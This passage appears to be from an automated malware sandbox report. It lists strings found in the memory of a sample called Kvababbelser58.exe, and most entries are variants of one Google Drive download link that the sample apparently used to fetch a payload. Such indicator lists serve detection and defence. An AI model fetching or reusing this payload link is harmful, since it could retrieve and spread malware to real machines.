00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/U
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2178267049.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/c
      Source: Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtw
      Source: Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNH=m
      Source: Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7M
      Source: Kvababbelser58.exe, 00000007.00000003.2468899939.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2480038094.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503720643.0000000005506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8O
      Source: Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2283529966.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downl
      Source: Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download&x
      Source: Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2204014071.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download1E
      Source: Kvababbelser58.exe, 00000007.00000003.2468899939.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2389230849.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2423609392.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2434863813.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.0000000005504000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download7
      Source: Kvababbelser58.exe, 00000007.00000003.2607422737.0000000005503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=download9
      Source: Kvababbelser58.exe, 00000007.00000003.2411860408.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2389230849.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2423609392.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2434863813.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.0000000005503000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadC
      Source: Kvababbelser58.exe, 00000007.00000003.2434863813.0000000005506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadGE
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2178267049.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadJx
      Source: Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2343055092.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadNo
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadO
      Source: Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadS
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloaddy
      Source: Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloade
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloade4
      Source: Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadid
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadjy
      Source: Kvababbelser58.exe, 00000007.00000003.2539052258.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2538964405.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2479955252.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526207160.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2526082458.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2503658422.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2378177514.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadnx
      Source: Kvababbelser58.exe, 00000007.00000002.2644866280.0000000005483000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloads
      Source: Kvababbelser58.exe, 00000007.00000003.2573212281.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2215808365.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2260760111.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2178267049.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2584924611.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2238138678.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2193158346.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2249209940.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054B6000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2204014071.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2343055092.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2365635239.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadt
      Source: Kvababbelser58.exe, 00000007.00000003.2607445936.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2595845411.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2618191876.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000002.2644866280.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=downloadtx
      Source: Kvababbelser58.exe, 00000007.00000003.2550569148.00000000054B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1lZSLtwUcNHMSRmAJ52P7MbvQ8Oxopcgm&export=doym
      Source: Kvababbelser58.exe, 00000007.00000003.2411860408.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/ontent.sandbox.google.com
      Source: Kvababbelser58.exe, 00000007.00000003.2468899939.0000000005506000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2492500295.0000000005503000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2480038094.0000000005506000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com;
      Source: powershell.exe, 00000002.00000002.2060046848.0000000004B96000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 00000002.00000002.2062497588.0000000005AA5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2166743209.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054F4000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: Kvababbelser58.exe, 00000007.00000003.2468899939.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2226806895.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2457346634.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2166743209.00000000054B9000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2400959952.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2630051151.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2562021024.00000000054F4000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2306619853.00000000054B1000.00000004.00000020.00020000.00000000.sdmp, Kvababbelser58.exe, 00000007.00000003.2177991415.00000000054B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
